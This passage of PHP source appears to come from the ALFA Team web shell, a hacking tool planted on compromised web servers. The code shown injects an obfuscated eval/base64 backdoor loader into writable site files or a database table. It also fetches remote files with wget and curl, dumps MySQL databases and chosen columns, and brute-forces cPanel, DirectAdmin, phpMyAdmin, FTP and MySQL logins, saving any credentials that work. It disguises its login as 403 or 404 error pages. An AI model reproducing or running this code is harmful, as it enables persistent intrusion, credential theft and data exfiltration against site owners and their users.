$select = "<div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select>";
$cwd = 'Example: /home/alfa/public_html/index.php';
if($_POST['alfa1']=='file'){
echo("<center><p><div class='txtfont_header'>| In File |</div></p><p><form onsubmit=\"g('inbackdoor',null,'file',this.method.value,this.file.value,this.shell.value,this.key.value);return false;\">{$select} <div class='txtfont'>Backdoor Loader:</div> <input type='text' name='file' size='50' placeholder='{$cwd}'> <div class='txtfont'>Key: </div> <input type='text' name='key' size='10' value='alfa'> <input type='submit' value=' '>{$textarea}</form></p></center>");
if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa4']!=''){
$method = $_POST['alfa2'];
$file = $_POST['alfa3'];
$shell = $_POST['alfa4'];
$key = str_replace(array('"','\''),'',trim($_POST['alfa5']));
if($key=='')$key='alfa';
if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
$code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x("'.$shell.'");exit;}?>';
if(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code."\n".@file_get_contents($file));__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}
if($_POST['alfa1']=='db'){
echo("<center><p><div class='txtfont_header'>| In DataBase |</div></p>".getConfigHtml('all')."<p><form onsubmit=\"g('inbackdoor',null,'db',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;\">");
$table = array('td1' =>
array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
'td2' =>
array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
'td3' =>
array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
'td4' =>
array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
'td5' =>
array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true),
'td6' =>
array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50')
);
create_table($table);
echo("<p>{$select}</p>");
echo($textarea);
echo("<p><input type='submit' value=' '></p></form></p></center>");
if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa5']!=''&&$_POST['alfa6']!=''){
$dbhost = $_POST['alfa2'];
$dbuser = $_POST['alfa3'];
$dbpw = $_POST['alfa4'];
$dbname = $_POST['alfa5'];
$file = $_POST['alfa6'];
$method = $_POST['alfa7'];
$shell = $_POST['alfa8'];
$key = str_replace(array('"','\''),'',trim($_POST['alfa9']));
if($key=='')$key='alfa';
if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
if($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){
$code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$conn=mysqli_connect("'.str_replace('"','\"',$dbhost).'","'.str_replace('"','\"',$dbuser).'","'.str_replace('"','\"',$dbpw).'","'.str_replace('"','\"',$dbname).'");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x($r["code"]);exit;}?>';
if(@is_file($file)&&@is_writable($file)){
@mysqli_query($conn,'DROP TABLE `alfa_bc`');
@mysqli_query($conn,'CREATE TABLE `alfa_bc` (code LONGTEXT)');
@mysqli_query($conn,'INSERT INTO `alfa_bc` VALUES("'.$shell.'")');
@file_put_contents($file,$code."\n".@file_get_contents($file));
__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}}
echo('</div>');
alfafooter();
}
function alfawhois(){
echo("<div class='header'><center><p><div class='txtfont_header'>| Whois |</div></p><p><form onsubmit=\"g('whois',null,this.url.value,'>>');return false;\"><div class='txtfont'>Url: </div> <input type='text' name='url' style='text-align:center;' size='50' placeholder='google.com'> <input type='submit' value=' '></form></p></center>");
if($_POST['alfa2']=='>>'&&!empty($_POST['alfa1'])){
$site = str_replace(array('http://','https://','www.','ftp://'),'',$_POST['alfa1']);
$target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain='.$site;
$data = @file_get_contents($target);
if($data==''){$get = new AlfaCURL();$get->ssl = true;$data = $get->Send($target);}
$target = @json_decode($data,true);
echo __pre();
if(is_array($target)){echo($target["whois_raw"]);}else{echo alfaEx("whois ".$site);}}
echo("</div>");
}
function alfaremotedl(){
alfahead();
echo("<div class='header'><center><p><div class='txtfont_header'>| Upload From Url |</div></p><p>
<form onsubmit=\"g('remotedl',null,this.d.value,this.p.value,'>>');return false;\">
<p><div class='txtfont'>Url: </div>&nbsp;&nbsp;&nbsp;<input type='text' name='d' size='50'></p>
<div class='txtfont'>Path:</div> <input type='text' name='p' size='50' value='".$GLOBALS['cwd']."'><p><input type='submit' value=' '></p>
</form></p></center>");
if(isset($_POST['alfa1'],$_POST['alfa2'],$_POST['alfa3'])&&!empty($_POST['alfa1'])&&$_POST['alfa3']=='>>'){
echo __pre();
$url = $_POST['alfa1'];
$path = $_POST['alfa2'];
echo('<center>');
if(__download($url,$path)){
echo('<font color="green">Success...!</font>');
}else{
echo('<font color="red">Error...!</font>');
}
echo('</center>');
}
echo("</div>");
alfafooter();
}
function __download($url,$path=false){
if(!preg_match("/[a-z]+:\/\/.+/",$url)) return false;
$saveas = basename(rawurldecode($url));
if($path){$saveas=$path.$saveas;}
if($content = __read_file($url)){
if(@is_file($saveas))@unlink($saveas);
if(__write_file($saveas, $content)){return true;}}
$buff = alfaEx("wget ".$url." -O ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("curl ".$url." -o ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("lwp-download ".$url." ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("lynx -source ".$url." > ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("GET ".$url." > ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("links -source ".$url." > ".$saveas);
if(@is_file($saveas)) return true;
$buff = alfaEx("fetch -o ".$saveas." -p ".$url);
if(@is_file($saveas)) return true;
return false;
}
function clean_string($string){
 if(function_exists("iconv")){
   $s = trim($string);
   $s = iconv("UTF-8", "UTF-8//IGNORE", $s);
 }
 return $s;
}
function __read_file($file, $boom = true){
$content = false;
if($fh = @fopen($file, "rb")){
$content = "";
while(!feof($fh)){
$content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);
}
@fclose($fh);
}
if(empty($content)||!$content){
  $content = alfaEx("cat '".addslashes($file)."'");
}
return $content;
}
function alfaMarket(){
echo "<div class='header'>";
$curl = new AlfaCURL();
$content = $curl->Send("http://solevisible.com/market.php");
$data = @json_decode($content, true);
if(!empty($data)){
if($data["status"] == "open"){
  echo $data["content"];
}else{
  echo $data["error_msg"];
}
}else{
  echo "<div style='text-align:center;font-size:20px;'>Cant connect to the alfa market....! try later.</div>";
}
echo "</div>";
}
function alfaSettings(){
alfahead();
AlfaNum(6,7,8,9,10);
echo '<div class=header><center><p><div class="txtfont_header">| Settings |</div></p><h3><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'main\')">| Generall Setting | </a></h3></center>';
if($_POST["alfa8"] == "main"){
echo '<p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="reloadSetting(this);return false;" method=\'post\'>';
$lg_array = array('0'=>'No','1'=>'Yes');
$penc_array = array('false'=>'No','true'=>'Yes');
$protect_html = "";
$icon_html = "";
$postEnc_html = "";
$login_html = "";
$cgiapi_html = "";
foreach($lg_array as $key=>$val)$protect_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['safemode']=='1'?'selected':'').'>'.$val.'</option>';
foreach($lg_array as $key=>$val)$icon_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['show_icons']=='1'?'selected':'').'>'.$val.'</option>';
foreach($penc_array as $key=>$val)$cgiapi_html .= '<option value="'.$key.'" '.(!empty($_POST['alfa9'])&&$_POST['alfa9']==$key?"selected":($GLOBALS["DB_NAME"]["cgi_api"]&&empty($_POST['alfa9'])?'selected':'')).'>'.$val.'</option>';
foreach($penc_array as $key=>$val)$postEnc_html .= '<option value="'.$key.'" '.(!empty($_POST['alfa7'])&&$_POST['alfa7']==$key?"selected":(__ALFA_POST_ENCRYPTION__&&empty($_POST['alfa7'])?'selected':'')).'>'.$val.'</option>';
$lg_array = array("gui"=>"GUI","500"=>"500 Internal Server Error","403"=>"403 Forbidden","404"=>"404 NotFound");
foreach($lg_array as $key=>$val)$login_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['login_page']==$key?'selected':'').'>'.$val.'</option>';
echo '';
echo '<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">'.$protect_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Cgi Api:</div></td><td><select name="cgi_api" style="width:100%;">'.$cgiapi_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">'.$postEnc_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">'.$icon_html.'</select></td></tr><tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">'.$login_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="'.(empty($_POST['alfa3'])?$GLOBALS['DB_NAME']['user']:$_POST['alfa3']).'" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="'.$GLOBALS['DB_NAME']['safemode'].'"><input type="hidden" name="s" value="'.$GLOBALS['DB_NAME']['show_icons'].'"><p><input type="submit" name="btn" value=" "></p></form></center>';
if($_POST['alfa5']=='>>'){
echo __pre();
if(!empty($_POST['alfa3'])){
$protect = $_POST['alfa1'];
$lgpage = $_POST['alfa2'];
$username = $_POST['alfa3'];
$password = md5($_POST['alfa4']);
$icon = $_POST['alfa6'];
$post_encrypt = $_POST['alfa7'];
$cgi_api_val = $_POST['alfa9'];
@chdir($GLOBALS['home_cwd']);
$basename = @basename($_SERVER['PHP_SELF']);
$data = @file_get_contents($basename);
$user_rand = $GLOBALS["DB_NAME"]["user_rand"];
$pass_rand = $GLOBALS["DB_NAME"]["pass_rand"];
$login_page_rand = $GLOBALS["DB_NAME"]["login_page_rand"];
$safemode_rand = $GLOBALS["DB_NAME"]["safemode_rand"];
$show_icons_rand = $GLOBALS["DB_NAME"]["show_icons_rand"];
$post_encryption_rand = $GLOBALS["DB_NAME"]["post_encryption_rand"];
$cgi_api_rand = $GLOBALS["DB_NAME"]["cgi_api_rand"];
$find_user = '/\''.$user_rand.'\'(.*?),/i';
$find_pw = '/\''.$pass_rand.'\'(.*?),/i';
$find_lg = '/\''.$login_page_rand.'\'(.*?),/i';
$find_p = '/\''.$safemode_rand.'\'(.*?),/i';
$icons = '/\''.$show_icons_rand.'\'(.*?),/i';
$postEnc = '/\''.$post_encryption_rand.'\'(.*?),/i';
$cgi_api_reg = '/\''.$cgi_api_rand.'\'(.*?),/i';
if(!empty($username)&&preg_match($find_user,$data,$e)){
$new = '\''.$user_rand.'\' => \''.$username.'\',';
$data = str_replace($e[0],$new,$data);
}
if(!empty($_POST['alfa4'])&&preg_match($find_pw,$data,$e)){
$new = '\''.$pass_rand.'\' => \''.$password.'\',';
$data = str_replace($e[0],$new,$data);
}
if(!empty($lgpage)&&preg_match($find_lg,$data,$e)){
$new = '\''.$login_page_rand.'\' => \''.$lgpage.'\',';
$data = str_replace($e[0],$new,$data);
}
if(!empty($find_p)&&preg_match($find_p,$data,$e)){
$new = '\''.$safemode_rand.'\' => \''.$protect.'\',';
$data = str_replace($e[0],$new,$data);
}
if(preg_match($icons,$data,$e)){
$new = '\''.$show_icons_rand.'\' => \''.$icon.'\',';
$data = str_replace($e[0],$new,$data);
}
if(preg_match($postEnc,$data,$e)){
$new = '\''.$post_encryption_rand.'\' => '.$post_encrypt.',';
$data = str_replace($e[0],$new,$data);
}
if(preg_match($cgi_api_reg,$data,$e)){
$new = '\''.$cgi_api_rand.'\' => '.$cgi_api_val.',';
$data = str_replace($e[0],$new,$data);
}
if(@file_put_contents($basename,$data)){
echo '<b>UserName: </b><font color="green"><b>'.$username.'</b></font><br /><b>Password: </b><font color="green"><b>'.$_POST['alfa4'].'</b></font><script>post_encryption_mode = '.$post_encrypt.';</script>';
}else{
__alert("<span style='color:red;'>File has no edit access...!</span>");
}
}else{
__alert("<span style='color:red;'>UserName is Empty !</span>");
}
}
}elseif($_POST["alfa8"] == "color"){
echo('<center><p><div class="txtfont_header">| Custom Color |</div></p><form onSubmit="reloadColors();return false;" method=\'post\'>');
echo '<table border="1"><tbody>';
$template = '<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>';
$x = 1;
foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
  $multi = "";
  if(is_array($value)){
    if(isset($value["multi_selector"])){
      $multi = __ZW5jb2Rlcg(json_encode($value));
    }
  }
  $value = alfa_getColor($key);
  $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));
  echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template);
}
echo '<tr><td style="text-align:center;">-</td><td style="text-align:center;"><div class="tbltxt">*</div></td><td><div style="margin-left:5px;" class="tbltxt">Use Default Color:</div></td><td></td><td><center><input type="checkbox" id="use_default_color" value="1"></center></td></tr>';

echo '</tbody></table><p><input type="submit" name="btn" value=" "></p></form><p><button style="padding:4px;;margin-right:20px;" onclick="$(\'importFileBtn\').click();" class="button"> Import </button> <button style="padding:4px;margin-left:20px;" onclick="g(\'settings\',null,null,null,null,null,null,null,\'export\',\'color\')" class="button"> Export </button></center></p>';
if($_POST['alfa7']=='export'){
  echo __pre();
  $colors = is_array($GLOBALS["DB_NAME"]["color"])?$GLOBALS["DB_NAME"]["color"]:array();
  $glob_colors = $GLOBALS["__ALFA_COLOR__"];
  $array = array();
  foreach($glob_colors as $k => $v){
    if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
      $v = trim($colors[$k]);
    }else{
      $v = trim(is_array($v)?$v["key_color"]:$v);
    }
    $array[$k] = $v;
  }
  $file = "alfa_color_config_".date('Y-m-d-h_i_s').".conf";
  $config = json_encode($array, JSON_PRETTY_PRINT);
  if(!@file_put_contents($file, $config)){
    echo('<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">'.$config.'</textarea></center></p>');
  }else{
    echo('<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$file.'\', \'download\')"><font color="#0F0">Download Config</font></a></center></p></h3>');
  }
}
if($_POST['alfa2']=='>>'){
  echo __pre();
  $colors = json_decode($_POST["alfa1"],true);
  $array = "";
  $is_default = isset($_POST["alfa3"])&&$_POST["alfa3"]=="1"?true:false;
  $glob_colors = $GLOBALS["__ALFA_COLOR__"];
  foreach($glob_colors as $k => $v){
    if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
      $v = trim($colors[$k]);
    }else{
      $v = trim(is_array($v)?$v["key_color"]:$v);
    }
    $array .= '"'.trim($k).'" => "'.$v.'",';
  }
  @chdir($GLOBALS['home_cwd']);
  $basename = @basename($_SERVER['PHP_SELF']);
  $data = @file_get_contents($basename);
  $color = '/\'color\'(.*?)\),/s';
  if(preg_match($color,$data,$e)){
    $new = "'color' => array(".$array."),";
    $data = str_replace($e[0],$new,$data);
    if(@file_put_contents($basename, $data)){
      echo("<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>");
    }else{
      echo("<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>");
    }
  }else{
    echo("<center><p><h3>[-] Error...!</h3></p></center>");
  }
}
}
echo('</div>');
alfafooter();
}
function alfaaboutus(){
alfahead();
echo '<div class="header">';
$news = new AlfaCURL();
$about_us = $news->Send("http://solevisible.com/aboutus.php");
if(empty($about_us)){
$about_us = "<pre><center><img src='http://solevisible.com/images/farvahar-iran.png'><br>
<b><font size='+3' color='#00A220'>&#9774; ~ PEACE ~ &#9774;</font><br><b>
<font color='#00A220'>Shell Coded By Sole Sad & Invisible (ALFA TEaM)</font><br>
<font color='#00A220'>Contact : [email protected]</font><br>
<font color='#00A220'>Telegram Channel: @solevisible</font><br>
<font color='#FFFFFF'>Skype : ehsan.invisible</font><br>
<font color='#FFFFFF'>Skype : sole.sad</font><br>
<font color='#FF0000'>Persian Gulf For Ever</font><br>
<font color='#FF0000'>Iranian Programmers</font><br>
<font color='#FF0000'>############</font><br>
</center></pre><iframe src='tg://resolve?domain=solevisible' frameborder='0' width='0' height='0'></iframe>";
}
echo __pre().$about_us;
echo('</div>');
alfafooter();
}
function alfacoldumper(){
alfahead();
echo('<div class="header">');
AlfaNum(8,9,10);
echo "<center><br><div class='txtfont_header'>| Mysql Column Dumper |</div><br><br>".getConfigHtml('all')."<form method='post' onsubmit=\"var opt_id=this.getAttribute('opt_id');var delimiter='json';try{if($('dumper-delimiter-type').value == 'delimiter')delimiter=$('dumper-delimiter-input').value}catch(e){};g('coldumper',null,delimiter,JSON.stringify(col_dumper_selected_data[opt_id]),this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); col_dumper_selected_data[opt_id] = {};return false;\"><p>";
$delimiter = (!empty($_POST['alfa1']) ? $_POST['alfa1'] : '::');
$selected_data = json_decode($_POST['alfa2'], true);
$username = ($_POST['alfa3']);
$password = ($_POST['alfa4']);
$dbname = ($_POST['alfa5']);
$dfile = ($_POST['alfa6']);
$host = ($_POST['alfa7']);
$table = array('td1' =>
array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => $host, 'inputSize' => '50'),
'td2' =>
array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => $username, 'inputSize' => '50'),
'td3' =>
array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => $password, 'inputSize' => '50'),
'td4' =>
array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => $dbname, 'inputSize' => '50'),
'td5' =>
array('color' => 'FFFFFF', 'tdName' => 'Output Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']), 'inputSize' => '50')
);
create_table($table);
echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
$db = false;
if(!empty($dbname)){
  $db = @mysqli_connect($host, $username, $password, $dbname);
}
if(count($selected_data) > 0){
  if($db){
    if(!is_dir($dfile)){
      $dfile = $GLOBALS['cwd'];
    }
    $tbls = "";
    $ext = '.txt';
    if($delimiter == 'json'){
      $ext = '.json';
    }
    foreach ($selected_data as $tbl => $cols) {
      $tables_query = mysqli_query($db, "SELECT ".implode(',', $cols)." FROM $tbl");
      $file_name = $dfile.'/'.$dbname.'.'.$tbl.$ext;
      $fp = fopen($file_name, "w");
      $data = array();
      while($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)){
        if($delimiter == "json"){
          $col_arr = array();
          foreach ($row as $key => $value) {
            if(empty($value)){
              $value = "[empty]";
            }
             $col_arr[$key] = $value;
          }
          $data[$tbl][] = $col_arr;
        }else{
          $data = "";
          foreach ($row as $key => $value) {
            if(empty($value)){
              $value = "[empty]";
            }
            $data .= $value . $delimiter;
          }
          fwrite($fp, $data ."\n");
        }
      }
      if($delimiter == "json"){
        fwrite($fp, json_encode($data));
      }
      fclose($fp);
      $tbls .= "Done ~~~> ".$file_name."<br>";
    }
    echo __pre();
    echo "<center><font color='#00FF00'>".$tbls."</font></center>";
  }
}
if(!empty($dbname) && count($selected_data) == 0){
//echo __pre();
if($db){
  echo("<hr><div style='text-align:center;margin-bottom:5px;font-weight:bolder;'><span>[ Select your tables and columns for dumping data ]</span></div>");
  echo("<div style='text-align:center;'><span>Output Type: </span><select id='dumper-delimiter-type' onchange='colDumplerSelectType(this);' name='output_type'><option value='delimiter' selected>delimiter</option><option value='json'>json</option></select><div id='coldumper-delimiter-input' style='display:inline;'><span> Delimiter: </span><input id='dumper-delimiter-input' style='text-align:center;' type='text' name='delimiter' placeholder='eg: ,'></div></div>");
  $data = array();
  $tables_query = mysqli_query($db, "SELECT table_name FROM information_schema.tables WHERE table_schema = database();");
  while($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)){
    $data[$row["table_name"]] = array();
    $table_count_q = mysqli_query($db, "SELECT count(*) FROM `".$row['table_name']."`");
    $table_count = mysqli_fetch_row($table_count_q);
    $data[$row["table_name"]]["data_count"] = $table_count[0];
    $columns_query = mysqli_query($db, "SELECT column_name FROM information_schema.columns WHERE table_name = '".$row['table_name']."'");
    while($row2 = mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){
      $data[$row["table_name"]]["cols"][] = $row2["column_name"];
    }
  }
  mysqli_close($db);

  echo '<ul id="myUL">';
  foreach($data as $tbl => $cols){
    echo '<li><span style="color:#00FF00;" class="box">'.$tbl.' ('.$cols["data_count"].')</span><ul class="nested">';
    foreach($cols["cols"] as $col){
      echo '<li tbl="'.$tbl.'"><span style="color:#00FF00;" tbl="'.$tbl.'" class="box sub-box">' . $col . '</span></li>';
    }
    echo '</ul></li>';
  }
  echo '</ul>';
}else{
echo('<center>mysqli_connect : Error!</center>');
}
}
echo('</div>');
alfafooter();
}
function alfaDumper(){
alfahead();
echo('<div class="header">');
AlfaNum(8,9,10);
echo "<center><br><div class='txtfont_header'>| Mysql Database Dumper |</div><br><br>".getConfigHtml('all')."<form method='post' onsubmit=\"g('dumper',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;\"><p>";
$table = array('td1' =>
array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
'td2' =>
array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
'td3' =>
array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
'td4' =>
array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
'td5' =>
array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']).'alfa.sql', 'inputSize' => '50')
);
create_table($table);
echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
$username = ($_POST['alfa3']);
$password = ($_POST['alfa4']);
$dbname = ($_POST['alfa5']);
$dfile = ($_POST['alfa6']);
$host = ($_POST['alfa7']);
if(!empty($dbname)){
echo __pre();
$msg = "<center>Check this : <font color='red'>".$dfile."</font></center>";
if(@mysqli_connect($host,$username,$password,$dbname)){
if(strlen(alfaEx("mysqldump"))>0){
alfaEx("mysqldump --single-transaction --host=\"$host\" --user=\"$username\" --password=\"$password\" $dbname > '".addslashes($dfile)."'");
echo($msg);
}else{
__alert("Error...!");
}
}else{
echo('<center>mysqli_connect : Error!</center>');
}
}
echo('</div>');
alfafooter();
}
function Alfa_DirectAdmin_Cracker($info){
if(!$info['mysql'])
$url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';
else $url = $info['protocol'].$info['target'].'/phpmyadmin';
$curl = curl_init();
curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($curl, CURLOPT_HEADER,0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);
if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
$result = @curl_exec($curl);
$curl_errno = curl_errno($curl);
$curl_error = curl_error($curl);
if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
elseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){
echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
$info['target'] = $url;
CrackerResualt($info);
}
curl_close($curl);
}
function Alfa_CP_Cracker($info){
$url = $info['protocol'].$info['target'].':'.$info['port'];
$curl = curl_init();
curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($curl, CURLOPT_HEADER,0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'].":".$info['password']) . "\n\r"));
curl_setopt($curl, CURLOPT_URL, $url);
$result = @curl_exec($curl);
$curl_errno = curl_errno($curl);
$curl_error = curl_error($curl);
if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
elseif(preg_match('/filemanager/i',$result)){
echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
$info['target'] = $url;
CrackerResualt($info);
}
curl_close($curl);
}
function Alfa_FTP_Cracker($info){
$url = $info['protocol'].$info['target'];
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_USERPWD, "".$info['username'].":".$info['password']."");
$result = @curl_exec($curl);
$curl_errno = curl_errno($curl);
$curl_error = curl_error($curl);
if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
elseif(preg_match('/(\d+):(\d+)/i',$result)){
echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
$info['target'] = $url;
CrackerResualt($info);
}
curl_close($curl);
}
function Alfa_Mysql_Cracker($info){
if(@mysqli_connect($info['target'].':'.$info['port'],$info['username'],$info['password'])){
CrackerResualt($info);
echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
}
}
function Alfa_FTPC($info){
if($con=@ftp_connect($info['target'],$info['port'])){
if($con){
$login=@ftp_login($con,$info['username'],$info['password']);
if($login){CrackerResualt($info);}}}
@ftp_close($con);
}
function CrackerResualt($info){
$res = $info['target'].' => '.$info['username'].":".$info['password']."\n" ;
$c = @fopen($info['fcrack'],'a+');
@fwrite($c, $res);
@fclose($c);
}
function Alfa_Call_Function_Cracker($method,$info){
switch($method){case 'cp':return Alfa_CP_Cracker($info);break;case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);break;case 'ftp':return Alfa_FTP_Cracker($info);break;case 'mysql':return Alfa_Mysql_Cracker($info);break;case 'mysql':return Alfa_FTPC($info);break;}
}
function alfaCrackers(){
alfahead();
AlfaNum(9,10);
